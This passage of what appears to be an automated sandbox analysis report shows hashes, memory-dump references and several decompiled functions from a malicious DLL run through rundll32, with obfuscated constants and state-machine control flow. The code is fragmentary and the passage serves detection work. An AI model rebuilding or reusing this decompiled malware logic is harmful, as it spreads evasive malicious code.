Opcode ID: 2e8e5a7989525394ea527459bf7471f90ccec202f3c22b3acccd88d9c4aab2da
Instruction ID: a7639446b8b4cee63292c28b4385ca5dbfe057a193b70b4a221de53670d226bc
Opcode Fuzzy Hash: 2e8e5a7989525394ea527459bf7471f90ccec202f3c22b3acccd88d9c4aab2da
Instruction Fuzzy Hash: 5DE19375A002288FDB26CF54CC81B9AB3F8FF46746F1541EAD949EB255E7319E408F81

Uniqueness

Uniqueness Score: -1.00%

Function 1002FE2A, Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: 90d64581cd0bf1be9f4ad65f7c138d495ffbda372ecda143036d11280657633e
Instruction ID: 7efd4e9a6f6185843bf9655f54d38c8024e1028a7ef161bcb6134e16c066a441
Opcode Fuzzy Hash: 90d64581cd0bf1be9f4ad65f7c138d495ffbda372ecda143036d11280657633e
Instruction Fuzzy Hash: 8CB126756007429FD729DB24CCA2BBBB3E8EF44349F55452DF9438A680EAB5F985CB00

Uniqueness

Uniqueness Score: -1.00%

Function 100357C0, Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c75734fa062886162f5a594cbc56912a5c3b6ea2c12dfbddb6b670a93a118ef
Instruction ID: 1537f683cadf3bf9a53e2a0a1a141fb3b9880c430cf9a34166f07beff673fd32
Opcode Fuzzy Hash: 4c75734fa062886162f5a594cbc56912a5c3b6ea2c12dfbddb6b670a93a118ef
Instruction Fuzzy Hash: 63916A75A001698FCB26CF18C891BDEB7F5EB89356F1581EADC0DAB250E7319E418F81

Uniqueness

Uniqueness Score: -1.00%

Function 00215D1D, Relevance: .2, Instructions: 183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00215D1D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _t165;
				intOrPtr* _t183;
				void* _t185;
				void* _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;

				_t183 = _a24;
				_push(_t183);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0020602B(_t165);
				_v96 = 0x1c20a7;
				_t194 = 0;
				_v84 = _v84 & 0;
				_t199 = _t198 + 0x20;
				_v92 = 0x7c153;
				_v88 = 0xb2086;
				_t185 = 0x2476afb9;
				_v8 = 0x4175;
				_v8 = _v8 + 0xffff57ff;
				_v8 = _v8 | 0xfffbf4ff;
				_v8 = _v8 ^ 0xffffd856;
				_v56 = 0x400d;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x01004a82;
				_v52 = 0xfa4b;
				_t195 = 0x3f;
				_v52 = _v52 * 0xf;
				_v52 = _v52 ^ 0x000ed31b;
				_v48 = 0x532b;
				_v48 = _v48 | 0xa8aca4f9;
				_v48 = _v48 ^ 0xa8acfbbc;
				_v44 = 0x6cab;
				_v44 = _v44 * 0xd;
				_v44 = _v44 ^ 0x0005813c;
				_v32 = 0xa076;
				_v32 = _v32 + 0x7ba7;
				_v32 = _v32 * 0x33;
				_v32 = _v32 ^ 0x0038af53;
				_v28 = 0x80ef;
				_v28 = _v28 << 0xb;
				_v28 = _v28 | 0xbfaa7514;
				_v28 = _v28 ^ 0xbfaf1f10;
				_v24 = 0x2421;
				_v24 = _v24 / _t195;
				_t196 = 3;
				_v24 = _v24 / _t196;
				_v24 = _v24 ^ 0x000050e2;
				_v68 = 0xf6e5;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0000085c;
				_v64 = 0x7950;
				_v64 = _v64 | 0xc26498fa;
				_v64 = _v64 ^ 0xc264e84e;
				_v60 = 0xb7cc;
				_v60 = _v60 + 0xffffacef;
				_v60 = _v60 ^ 0x0000478a;
				_v40 = 0x6379;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 << 5;
				_v40 = _v40 ^ 0x00006e22;
				_v20 = 0xe665;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0xe4ef8652;
				_v20 = _v20 + 0xffffeafe;
				_v20 = _v20 ^ 0xe52339cd;
				_v80 = 0x4d1e;
				_v80 = _v80 + 0xffffc710;
				_v80 = _v80 ^ 0x000046ed;
				_v16 = 0x18c;
				_v16 = _v16 >> 4;
				_t197 = _v80;
				_v16 = _v16 * 0x41;
				_v16 = _v16 ^ 0x73128289;
				_v16 = _v16 ^ 0x7312c7aa;
				_v12 = 0xdd0b;
				_v12 = _v12 + 0xffff65de;
				_v12 = _v12 * 0x3b;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x0f6bc641;
				_v76 = 0xf5b7;
				_v76 = _v76 ^ 0xdca6f1c9;
				_v76 = _v76 ^ 0xdca64fd3;
				_v36 = 0xdf9f;
				_v36 = _v36 + 0x7ffe;
				_v36 = _v36 + 0x4fda;
				_v36 = _v36 ^ 0x00019ee0;
				_v72 = 0x5c39;
				_v72 = _v72 ^ 0x85106c7e;
				_v72 = _v72 ^ 0x85105bd4;
				do {
					while(_t185 != 0x6efb3d4) {
						if(_t185 == 0xfd0cdc7) {
							_t197 = E002196CB(_t185, _v8, _v56, _v52, _a20, _v48, 0, _v44, _v32, _a12, _t185, _a16, 0, _v28, _v24);
							_t199 = _t199 + 0x38;
							if(_t197 == 0) {
								L15:
								return _t194;
							}
							_t185 = 0x6efb3d4;
							continue;
						}
						if(_t185 == 0x1eddc4e8) {
							E002196CB(_t185, _v40, _v20, _v80, _a20, _v16, _t197, _v12, _v76, _a12, _t185, _a16, _t194, _v36, _v72);
							if(_t183 != 0) {
								 *_t183 = _t197;
							}
							goto L15;
						}
						if(_t185 != 0x2476afb9) {
							goto L11;
						}
						_t185 = 0xfd0cdc7;
					}
					_push(_t185);
					_push(_t185);
					_t194 = E00208736(_t197);
					if(_t194 == 0) {
						_t185 = 0x710c028;
						goto L11;
					}
					_t185 = 0x1eddc4e8;
					continue;
					L11:
				} while (_t185 != 0x710c028);
				goto L15;
			}

0x00215d24
0x00215d29
0x00215d2a
0x00215d2d
0x00215d30
0x00215d33
0x00215d36
0x00215d3a
0x00215d3b
0x00215d40
0x00215d47
0x00215d49
0x00215d4c
0x00215d4f
0x00215d58
0x00215d5f
0x00215d64
0x00215d6b
0x00215d72
0x00215d79
0x00215d80
0x00215d87
0x00215d8b
0x00215d92
0x00215d9f
0x00215da2
0x00215da5
0x00215dac
0x00215db3
0x00215dba
0x00215dc1
0x00215dcc
0x00215dcf
0x00215dd6
0x00215ddd
0x00215de8
0x00215deb
0x00215df2
0x00215df9
0x00215dfd
0x00215e04
0x00215e0b
0x00215e19
0x00215e1f
0x00215e22
0x00215e25
0x00215e2c
0x00215e33
0x00215e37
0x00215e3e
0x00215e45
0x00215e4c
0x00215e53
0x00215e5a
0x00215e61
0x00215e68
0x00215e6f
0x00215e73
0x00215e77
0x00215e7e
0x00215e85
0x00215e89
0x00215e90
0x00215e97
0x00215e9e
0x00215ea5
0x00215eac
0x00215eb3
0x00215eba
0x00215ec2
0x00215ec5
0x00215ec8
0x00215ecf
0x00215ed6
0x00215edd
0x00215ee8
0x00215eeb
0x00215eef
0x00215ef6
0x00215efd
0x00215f04
0x00215f0b
0x00215f12
0x00215f19
0x00215f20
0x00215f27
0x00215f2e
0x00215f35
0x00215f3c
0x00215f3c
0x00215f4a
0x00215f92
0x00215f94
0x00215f99
0x0021600b
0x00216013
0x00216013
0x00215f9b
0x00000000
0x00215f9b
0x00215f52
0x00215ffd
0x00216007
0x00216009
0x00216009
0x00000000
0x00216007
0x00215f5e
0x00000000
0x00000000
0x00215f60
0x00215f60
0x00215fab
0x00215fac
0x00215fb4
0x00215fba
0x00215fc6
0x00000000
0x00215fc6
0x00215fbc
0x00000000
0x00215fcb
0x00215fcb
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction ID: 1f5af37553afa7c9b1b4180b55e75e134ba2ff8cd71b7cc0d68ea4723c98ff3b
Opcode Fuzzy Hash: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction Fuzzy Hash: 6C913472C1021AABDF15CFE5D9895EEBFB1FF44314F208048E611762A0D3B90A65CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00210F0C, Relevance: .2, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00210F0C(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t132;
				signed int _t149;
				void* _t152;
				void* _t154;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t181;

				_push(_a20);
				_t152 = __edx;
				_push(0xffffffff);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t132);
				_v44 = 0x160;
				_t181 = _t180 + 0x1c;
				_v44 = _v44 ^ 0x1b432315;
				_v44 = _v44 ^ 0x1b433d06;
				_t179 = 0;
				_v12 = 0x3352;
				_t154 = 0x2476afb9;
				_v12 = _v12 + 0xffffca9f;
				_v12 = _v12 << 1;
				_t173 = 0x29;
				_v12 = _v12 / _t173;
				_v12 = _v12 ^ 0x063e5c60;
				_v8 = 0x701a;
				_t174 = 0x52;
				_v8 = _v8 / _t174;
				_t175 = 0x4e;
				_v8 = _v8 / _t175;
				_t176 = 0x41;
				_v8 = _v8 / _t176;
				_v8 = _v8 ^ 0x0000431a;
				_v40 = 0xf48c;
				_v40 = _v40 + 0xffff0dc2;
				_v40 = _v40 ^ 0x0000090f;
				_v36 = 0x5475;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x2a3aa88b;
				_v16 = 0xfc71;
				_v16 = _v16 ^ 0x0a975394;
				_v16 = _v16 | 0x3f9daa18;
				_v16 = _v16 + 0xffff523a;
				_v16 = _v16 ^ 0x3f9f63b5;
				_v48 = 0xbfc9;
				_t177 = 0x63;
				_v48 = _v48 / _t177;
				_v48 = _v48 ^ 0x0000151a;
				_v32 = 0xfc2a;
				_v32 = _v32 | 0x12ce1451;
				_v32 = _v32 + 0x3ff4;
				_v32 = _v32 ^ 0x12cf51f6;
				_v56 = 0x5ac8;
				_v56 = _v56 | 0xf85dcbd1;
				_v56 = _v56 ^ 0xf85dd81d;
				_v52 = 0x6e3;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x0006be09;
				_v28 = 0x1612;
				_v28 = _v28 ^ 0x471c56e0;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0xffff1cc1;
				_v28 = _v28 ^ 0x238d2d3e;
				_v24 = 0x515e;
				_v24 = _v24 + 0x963f;
				_v24 = _v24 + 0xffff7349;
				_t178 = _v56;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000650d8;
				_v20 = 0x1a04;
				_v20 = _v20 | 0x2258a5ab;
				_v20 = _v20 + 0xffff2fa3;
				_v20 = _v20 + 0x9894;
				_v20 = _v20 ^ 0x2258a793;
				do {
					while(_t154 != 0x6efb3d4) {
						if(_t154 == 0xfd0cdc7) {
							_t149 = E00217AFD(_v44, _v12, _t154, _v8, 0, _t152, 0, 0xffffffff, _v40, _v36, _a12);
							_t178 = _t149;
							_t181 = _t181 + 0x24;
							if(_t149 != 0) {
								_t154 = 0x6efb3d4;
								continue;
							}
						} else {
							if(_t154 == 0x1eddc4e8) {
								E00217AFD(_v56, _v52, _t154, _v28, _t179, _t152, _t178, 0xffffffff, _v24, _v20, _a12);
							} else {
								if(_t154 != 0x2476afb9) {
									goto L11;
								} else {
									_t154 = 0xfd0cdc7;
									continue;
								}
							}
						}
						L14:
						return _t179;
					}
					_push(_t154);
					_push(_t154);
					_t179 = E00208736(_t178 + _t178);
					if(_t179 == 0) {
						_t154 = 0x710c028;
						goto L11;
					} else {
						_t154 = 0x1eddc4e8;
						continue;
					}
					goto L14;
					L11:
				} while (_t154 != 0x710c028);
				goto L14;
			}

0x00210f15
0x00210f18
0x00210f1a
0x00210f1c
0x00210f1f
0x00210f22
0x00210f24
0x00210f25
0x00210f26
0x00210f2b
0x00210f32
0x00210f35
0x00210f3e
0x00210f45
0x00210f47
0x00210f4e
0x00210f53
0x00210f5a
0x00210f62
0x00210f67
0x00210f6c
0x00210f73
0x00210f7d
0x00210f82
0x00210f8a
0x00210f8f
0x00210f97
0x00210f9c
0x00210fa1
0x00210fa8
0x00210faf
0x00210fb6
0x00210fbd
0x00210fc4
0x00210fc8
0x00210fcf
0x00210fd6
0x00210fdd
0x00210fe4
0x00210feb
0x00210ff2
0x00210ffc
0x00210fff
0x00211002
0x00211009
0x00211010
0x00211017
0x0021101e
0x00211025
0x0021102c
0x00211033
0x0021103a
0x00211041
0x00211045
0x0021104c
0x00211053
0x0021105a
0x0021105d
0x00211064
0x0021106b
0x00211072
0x00211079
0x00211084
0x00211087
0x0021108a
0x00211091
0x00211098
0x0021109f
0x002110a6
0x002110ad
0x002110b4
0x002110b4
0x002110c2
0x002110f5
0x002110fa
0x002110fc
0x00211101
0x00211103
0x00000000
0x00211103
0x002110c4
0x002110ca
0x00211157
0x002110cc
0x002110d2
0x00000000
0x002110d4
0x002110d4
0x00000000
0x002110d4
0x002110d2
0x002110ca
0x00211160
0x00211167
0x00211167
0x00211113
0x00211114
0x0021111d
0x00211123
0x0021112c
0x00000000
0x00211125
0x00211125
0x00000000
0x00211125
0x00000000
0x00211131
0x00211131
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction ID: d09e0ac01f2c9308a609d6a823030f7aa8c43f4cd45864b2734c59e73d6cd270
Opcode Fuzzy Hash: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction Fuzzy Hash: 2B617F72D1130AEBDF14CFA5C9859EEFBB2FF58314F248219E612B6290D3B54A518F90

Uniqueness

Uniqueness Score: -1.00%

Function 0020F444, Relevance: .1, Instructions: 128
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0020F444(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t120;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				intOrPtr* _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				void* _t159;
				void* _t160;

				_t128 = __ecx;
				_t152 =  *0x21ca24; // 0x0
				while(_t152 != 0) {
					if( *((intOrPtr*)(_t152 + 0x28)) != 0) {
						 *((intOrPtr*)(_t152 + 4))( *((intOrPtr*)(_t152 + 0x28)), 0xb, 0);
					}
					_t152 =  *((intOrPtr*)(_t152 + 0x2c));
				}
				_t129 = _t128 | 0xffffffff;
				_pop(_t153);
				_t160 = _t159 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_t126 = _t129;
				_t149 = 0x21ca24;
				_t130 = 0x77;
				_v8 = _v8 / _t130;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_t131 = 0x67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / _t131;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t154 =  *0x21ca24; // 0x0
				while(_t154 != 0) {
					if( *((intOrPtr*)(_t154 + 0x28)) == 0) {
						L10:
						 *_t149 =  *((intOrPtr*)(_t154 + 0x2c));
						_t120 = E0020F536(_v20, _v40, _v48, _t154);
					} else {
						_t120 = E0021086F(_v8, _v44,  *((intOrPtr*)(_t154 + 0x1c)), _t126, _v24);
						_t160 = _t160 + 0xc;
						if(_t120 != _v28) {
							_t112 = _t154 + 0x2c; // 0x2c
							_t149 = _t112;
						} else {
							 *((intOrPtr*)(_t154 + 4))( *((intOrPtr*)(_t154 + 0x28)), 0, 0);
							E0021422C(_v12,  *((intOrPtr*)(_t154 + 0x28)), _v32);
							E00214F7D(_v36, _v16,  *((intOrPtr*)(_t154 + 0x1c)));
							goto L10;
						}
					}
					_t154 =  *_t149;
				}
				return _t120;
			}

0x0020f444
0x0020f445
0x0020f460
0x0020f451
0x0020f45a
0x0020f45a
0x0020f45d
0x0020f45d
0x0020f464
0x0020f467
0x002198a6
0x002198a9
0x002198b2
0x002198c1
0x002198c3
0x002198c8
0x002198cd
0x002198d2
0x002198d6
0x002198dd
0x002198e8
0x002198e9
0x002198ec
0x002198f3
0x002198fa
0x00219901
0x00219905
0x0021990c
0x00219913
0x0021991c
0x0021991f
0x00219926
0x0021992d
0x00219934
0x00219937
0x0021993b
0x00219942
0x00219949
0x0021994d
0x00219951
0x00219958
0x0021995f
0x00219966
0x0021996a
0x00219971
0x00219978
0x0021997f
0x00219986
0x0021998d
0x00219994
0x0021999b
0x002199a6
0x002199a9
0x002199b0
0x002199b7
0x002199be
0x002199c1
0x002199c8
0x002199cf
0x002199d3
0x002199d7
0x002199de
0x00219a46
0x002199ea
0x00219a2e
0x00219a3b
0x00219a3d
0x002199ec
0x002199f9
0x002199fe
0x00219a04
0x00219a51
0x00219a51
0x00219a06
0x00219a0d
0x00219a19
0x00219a27
0x00000000
0x00219a2d
0x00219a04
0x00219a44
0x00219a44
0x00219a50

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ebfb299d3536d26433af71e45e69eac4813b79a53bffea7d51b0c169f39727
Instruction ID: b8813f2e0ea4ec9cd2eebd4589d06efc70093b8283b02ba232572c4d6cbf1647
Opcode Fuzzy Hash: 74ebfb299d3536d26433af71e45e69eac4813b79a53bffea7d51b0c169f39727
Instruction Fuzzy Hash: C5515232D00309DBDB19CFA4D98A9DEBBF0BF18318F208159D516762A0C7B46A99CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002171EF, Relevance: .1, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002171EF(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v68;
				char _v144;
				void* __ecx;
				void* _t94;
				void* _t106;
				void* _t108;
				void* _t110;
				void* _t112;
				void* _t114;
				signed int _t120;
				void* _t142;
				void* _t144;
				void* _t146;
				void* _t147;

				_t147 = __eflags;
				_push(_a4);
				_push(__edx);
				E0020602B(_t94);
				_v20 = 0xa5d0;
				_v20 = _v20 | 0x3487ecbd;
				_v20 = _v20 + 0xffff03d0;
				_t142 = 0;
				_v20 = _v20 + 0x3a47;
				_v20 = _v20 ^ 0x348731c7;
				_v28 = 0xdd31;
				_v28 = _v28 << 0x10;
				_v28 = _v28 | 0x8f0862d8;
				_v28 = _v28 ^ 0xdf391de9;
				_v16 = 0xb0e;
				_v16 = _v16 << 4;
				_v16 = _v16 << 0xa;
				_t120 = 0x14;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x461d447c;
				_v12 = 0xa74;
				_v12 = _v12 << 0xc;
				_v12 = _v12 + 0x835b;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0053bc14;
				_v36 = 0xa6cf;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x000104b7;
				_v24 = 0x4d22;
				_v24 = _v24 >> 6;
				_v24 = _v24 + 0xef2f;
				_v24 = _v24 ^ 0x0000ed15;
				_v44 = 0x3931;
				_v44 = _v44 * 0x11;
				_v44 = _v44 ^ 0x00039362;
				_v40 = 0xec47;
				_v40 = _v40 ^ 0x28f00c99;
				_v40 = _v40 ^ 0x28f09017;
				_v32 = 0x2800;
				_v32 = _v32 / _t120;
				_v32 = _v32 ^ 0x971b94ed;
				_v32 = _v32 ^ 0x971b9d0a;
				E002150F2( &_v144, _v20, _v28, _v16, __edx);
				_t146 = _t144 + 0x18;
				L13:
				if(E0020B055(_v12, _v36, _t147,  &_v144,  &_v68) != 0) {
					_t106 = E00201280(_v24, _v44, _v40,  &_v60,  &_v68, _v32);
					_t146 = _t146 + 0x10;
					__eflags = _t106;
					if(__eflags != 0) {
						_t108 = _v56 - 1;
						__eflags = _t108;
						if(_t108 == 0) {
							E00206754(_v60,  &_v52);
						} else {
							_t110 = _t108 - 1;
							__eflags = _t110;
							if(_t110 == 0) {
								E00208F78(_v60,  &_v52);
							} else {
								_t112 = _t110 - 1;
								__eflags = _t112;
								if(_t112 == 0) {
									E002126F5(_v60,  &_v52);
								} else {
									_t114 = _t112 - 1;
									__eflags = _t114;
									if(_t114 == 0) {
										E00204A35(_v60,  &_v52);
									} else {
										__eflags = _t114 == 6;
										if(_t114 == 6) {
											E002069A0(_v60,  &_v52);
										}
									}
								}
							}
						}
						_t142 = _t142 + 1;
						__eflags = _t142;
					}
					goto L13;
				}
				return _t142;
			}

0x002171ef
0x002171fa
0x002171ff
0x00217201
0x00217206
0x00217210
0x00217219
0x00217220
0x00217222
0x00217229
0x00217230
0x00217237
0x0021723b
0x00217242
0x00217249
0x00217250
0x00217254
0x0021725e
0x00217260
0x00217263
0x0021726a
0x00217271
0x00217275
0x0021727c
0x0021727f
0x00217286
0x0021728d
0x00217290
0x00217297
0x0021729e
0x002172a2
0x002172a9
0x002172b0
0x002172bb
0x002172be
0x002172c5
0x002172cc
0x002172d3
0x002172da
0x002172ec
0x002172ef
0x002172f6
0x00217306
0x0021730b
0x00217384
0x0021739e
0x00217324
0x00217329
0x0021732c
0x0021732e
0x00217333
0x00217333
0x00217334
0x0021737e
0x00217336
0x00217336
0x00217336
0x00217337
0x00217371
0x00217339
0x00217339
0x00217339
0x0021733a
0x00217364
0x0021733c
0x0021733c
0x0021733c
0x0021733d
0x00217357
0x0021733f
0x0021733f
0x00217342
0x0021734a
0x0021734a
0x00217342
0x0021733d
0x0021733a
0x00217337
0x00217383
0x00217383
0x00217383
0x00000000
0x0021732e
0x002173ab

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction ID: 072396fbb64e0676109ffb46f8d8977120ab56977a7138b88809f916bec3648f
Opcode Fuzzy Hash: 9e60bb529e95b2fd998923d9e3cb4c74cf202ff18c9249fb7b0ce3a5257b475f
Instruction Fuzzy Hash: 5F513A71D2421EEBDF04DFA0D8858EEBBB5FF94304F108159E421B6290D7B85A99CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00218ADC, Relevance: .1, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00218ADC(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t109;
				void* _t115;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				char* _t120;
				intOrPtr* _t139;
				void* _t140;

				_v44 = 0xbe2c;
				_v44 = _v44 | 0x84c59b93;
				_v44 = _v44 ^ 0x84c5dc14;
				_v12 = 0x6fb6;
				_v12 = _v12 << 0xc;
				_t139 = __ecx;
				_t117 = 0x2e;
				_v12 = _v12 / _t117;
				_v12 = _v12 + 0xcda3;
				_v12 = _v12 ^ 0x0027e688;
				_v28 = 0xcabb;
				_v28 = _v28 + 0xd310;
				_v28 = _v28 | 0x3c203c9f;
				_v28 = _v28 ^ 0x3c2189d4;
				_v36 = 0x4eab;
				_v36 = _v36 | 0x84b19700;
				_v36 = _v36 ^ 0x84b1b180;
				_v8 = 0xd8ee;
				_v8 = _v8 + 0xffff63d4;
				_v8 = _v8 ^ 0xfc264e39;
				_v8 = _v8 ^ 0x6fc556fb;
				_v8 = _v8 ^ 0x93e330d5;
				_v20 = 0x5c82;
				_v20 = _v20 | 0x7a047e0a;
				_v20 = _v20 << 5;
				_t118 = 0x1b;
				_v20 = _v20 * 0x43;
				_v20 = _v20 ^ 0xe5a3df6f;
				_v40 = 0x7499;
				_v40 = _v40 >> 8;
				_v40 = _v40 ^ 0x0000130c;
				_v16 = 0x5702;
				_v16 = _v16 << 8;
				_v16 = _v16 << 6;
				_v16 = _v16 + 0xffffa72f;
				_v16 = _v16 ^ 0x15c040b7;
				_v32 = 0x67e1;
				_v32 = _v32 / _t118;
				_v32 = _v32 ^ 0x8e6cf5d6;
				_v32 = _v32 ^ 0x8e6ccf96;
				_v24 = 0x77;
				_t119 = 0x69;
				_v24 = _v24 * 0x25;
				_t120 =  &_v304;
				_v24 = _v24 / _t119;
				_v24 = _v24 ^ 0x863bea64;
				_v24 = _v24 ^ 0x863bfaf8;
				while(1) {
					_t109 =  *_t139;
					if(_t109 == 0) {
						break;
					}
